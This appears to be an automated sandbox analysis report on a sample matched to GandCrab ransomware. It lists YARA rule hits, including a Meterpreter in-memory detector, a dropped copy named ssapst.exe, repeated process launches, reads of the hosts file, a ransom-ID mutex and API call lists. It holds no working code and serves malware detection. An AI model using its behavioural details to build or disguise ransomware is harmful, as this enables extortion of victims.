Source: 0000000F.00000003.484382333.0000000003300000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 0000000F.00000003.484382333.0000000003300000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 0000000F.00000003.484382333.0000000003300000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 0000000F.00000003.484382333.0000000003300000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 0000000E.00000003.456730321.0000000003730000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 0000000E.00000003.456730321.0000000003730000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 0000000E.00000003.456730321.0000000003730000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 0000000E.00000003.456730321.0000000003730000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 0000000E.00000003.456730321.0000000003730000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 00000002.00000003.369602233.0000000003640000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 00000002.00000003.369602233.0000000003640000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 00000002.00000003.369602233.0000000003640000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 00000002.00000003.369602233.0000000003640000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 00000002.00000003.369602233.0000000003640000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 00000019.00000003.601841912.00000000036D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 00000019.00000003.601841912.00000000036D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 00000019.00000003.601841912.00000000036D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 00000019.00000003.601841912.00000000036D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 00000019.00000003.601841912.00000000036D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 00000008.00000003.419920296.00000000030F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 00000008.00000003.419920296.00000000030F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 00000008.00000003.419920296.00000000030F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 00000008.00000003.419920296.00000000030F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 00000008.00000003.419920296.00000000030F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 00000012.00000003.513687059.0000000003230000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 00000012.00000003.513687059.0000000003230000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 00000012.00000003.513687059.0000000003230000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 00000012.00000003.513687059.0000000003230000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 00000012.00000003.513687059.0000000003230000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: Process Memory Space: wThN5MTIsw.exe PID: 6388, type: MEMORYSTR	Matched rule: HKTL_Meterpreter_inMemory date = 2020-06-29, author = netbiosX, Florian Roth, description = Detects Meterpreter in-memory, score = , reference = https://www.reddit.com/r/purpleteamsec/comments/hjux11/meterpreter_memory_indicators_detection_tooling/
Source: Process Memory Space: ssapst.exe PID: 6592, type: MEMORYSTR	Matched rule: HKTL_Meterpreter_inMemory date = 2020-06-29, author = netbiosX, Florian Roth, description = Detects Meterpreter in-memory, score = , reference = https://www.reddit.com/r/purpleteamsec/comments/hjux11/meterpreter_memory_indicators_detection_tooling/
Source: Process Memory Space: ssapst.exe PID: 6228, type: MEMORYSTR	Matched rule: HKTL_Meterpreter_inMemory date = 2020-06-29, author = netbiosX, Florian Roth, description = Detects Meterpreter in-memory, score = , reference = https://www.reddit.com/r/purpleteamsec/comments/hjux11/meterpreter_memory_indicators_detection_tooling/
Source: Process Memory Space: ssapst.exe PID: 7020, type: MEMORYSTR	Matched rule: HKTL_Meterpreter_inMemory date = 2020-06-29, author = netbiosX, Florian Roth, description = Detects Meterpreter in-memory, score = , reference = https://www.reddit.com/r/purpleteamsec/comments/hjux11/meterpreter_memory_indicators_detection_tooling/
Source: Process Memory Space: ssapst.exe PID: 7108, type: MEMORYSTR	Matched rule: HKTL_Meterpreter_inMemory date = 2020-06-29, author = netbiosX, Florian Roth, description = Detects Meterpreter in-memory, score = , reference = https://www.reddit.com/r/purpleteamsec/comments/hjux11/meterpreter_memory_indicators_detection_tooling/
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe, type: DROPPED	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe, type: DROPPED	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe, type: DROPPED	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe, type: DROPPED	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe, type: DROPPED	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware

Source: C:\Users\user\Desktop\wThN5MTIsw.exe	Code function: 0_2_0F4E1C20	0_2_0F4E1C20
Source: C:\Users\user\Desktop\wThN5MTIsw.exe	Code function: 0_2_0F4E1020	0_2_0F4E1020
Source: C:\Users\user\Desktop\wThN5MTIsw.exe	Code function: 0_2_0F4E8520	0_2_0F4E8520
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Code function: 2_2_0FE61C20	2_2_0FE61C20
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Code function: 2_2_0FE61020	2_2_0FE61020
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Code function: 2_2_0FE68520	2_2_0FE68520
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Code function: 4_2_0FE61C20	4_2_0FE61C20
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Code function: 4_2_0FE61020	4_2_0FE61020
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Code function: 4_2_0FE68520	4_2_0FE68520

Source: wThN5MTIsw.exe	Virustotal: Detection: 90%
Source: wThN5MTIsw.exe	ReversingLabs: Detection: 93%

Source: C:\Users\user\Desktop\wThN5MTIsw.exe

File read: C:\Users\user\Desktop\wThN5MTIsw.exe

Jump to behavior

Source: wThN5MTIsw.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\wThN5MTIsw.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\wThN5MTIsw.exe "C:\Users\user\Desktop\wThN5MTIsw.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe "C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe "C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe "C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe "C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe "C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe "C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe "C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe "C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe "C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe "C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe "C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe "C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe "C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe "C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe "C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe "C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe "C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe "C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe "C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe "C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe"

Source: C:\Users\user\Desktop\wThN5MTIsw.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\wThN5MTIsw.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe

Jump to behavior

Source: classification engine

Classification label: mal100.rans.troj.evad.winEXE@21/1@17/0

Source: C:\Users\user\Desktop\wThN5MTIsw.exe

Code function: 0_2_0F4E7490 VirtualAlloc,VirtualAlloc,GetUserNameW,VirtualAlloc,GetComputerNameW,wsprintfW,VirtualAlloc,wsprintfW,VirtualAlloc,RegOpenKeyExW,RegQueryValueExW,GetLastError,RegCloseKey,VirtualFree,VirtualAlloc,VirtualAlloc,wsprintfW,RegOpenKeyExW,RegQueryValueExW,GetLastError,RegCloseKey,lstrcmpiW,wsprintfW,VirtualFree,VirtualAlloc,VirtualAlloc,wsprintfW,GetNativeSystemInfo,VirtualAlloc,wsprintfW,ExitProcess,wsprintfW,VirtualAlloc,VirtualAlloc,GetWindowsDirectoryW,GetVolumeInformationW,lstrlenW,wsprintfW,lstrcatW,lstrcatW,GetModuleHandleW,GetProcAddress,lstrlenW,VirtualFree,lstrcatW,VirtualAlloc,GetDriveTypeW,lstrcatW,lstrcatW,lstrcatW,GetDiskFreeSpaceW,lstrlenW,wsprintfW,wsprintfW,lstrlenW,lstrlenW,wsprintfW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,lstrlenW,VirtualAlloc,VirtualFree,

0_2_0F4E7490

Source: C:\Users\user\Desktop\wThN5MTIsw.exe

Code function: 0_2_0F4E7B70 wsprintfW,VirtualAlloc,VirtualAlloc,VirtualAlloc,VirtualAlloc,CreateToolhelp32Snapshot,VirtualFree,Process32FirstW,lstrcmpiW,lstrcpyW,lstrcatW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,Process32NextW,GetLastError,lstrlenW,VirtualFree,VirtualFree,FindCloseChangeNotification,VirtualFree,

0_2_0F4E7B70

Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe

Mutant created: \Sessions\1\BaseNamedObjects\Global\pc_group=WORKGROUP&ransom_id=cec3c1ad6b0ea08f

Source: C:\Users\user\Desktop\wThN5MTIsw.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\wThN5MTIsw.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	File read: C:\Windows\System32\drivers\etc\hosts

Source: wThN5MTIsw.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH

Data Obfuscation

Yara detected ReflectiveLoader

Source: Yara match	File source: wThN5MTIsw.exe, type: SAMPLE
Source: Yara match	File source: 34.3.ssapst.exe.32a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 32.3.ssapst.exe.3790000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.wThN5MTIsw.exe.3170000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.0.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.wThN5MTIsw.exe.f4e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.3.ssapst.exe.3520000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.3.ssapst.exe.2fc0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.3.ssapst.exe.36d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.3.ssapst.exe.2f70000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.3.ssapst.exe.36d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 32.2.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.wThN5MTIsw.exe.3170000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.3.ssapst.exe.3b60000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.3.ssapst.exe.3830000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.0.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.0.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 34.3.ssapst.exe.32a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.2.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.3.ssapst.exe.3230000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.3.ssapst.exe.3300000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.ssapst.exe.3730000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.3.ssapst.exe.3b60000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.3.ssapst.exe.3230000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.3.ssapst.exe.3300000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.0.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.3.ssapst.exe.3520000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.0.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.3.ssapst.exe.38c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.0.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.0.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.3.ssapst.exe.30f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.ssapst.exe.3640000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.3.ssapst.exe.3730000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.3.ssapst.exe.3830000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.3.ssapst.exe.30f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 34.2.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.3.ssapst.exe.3d30000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.3.ssapst.exe.38c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.0.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.3.ssapst.exe.2fc0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.3.ssapst.exe.2f70000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.2.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.3.ssapst.exe.3d30000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.ssapst.exe.3730000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.ssapst.exe.3640000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.0.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.3.ssapst.exe.3730000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.0.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.0.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE
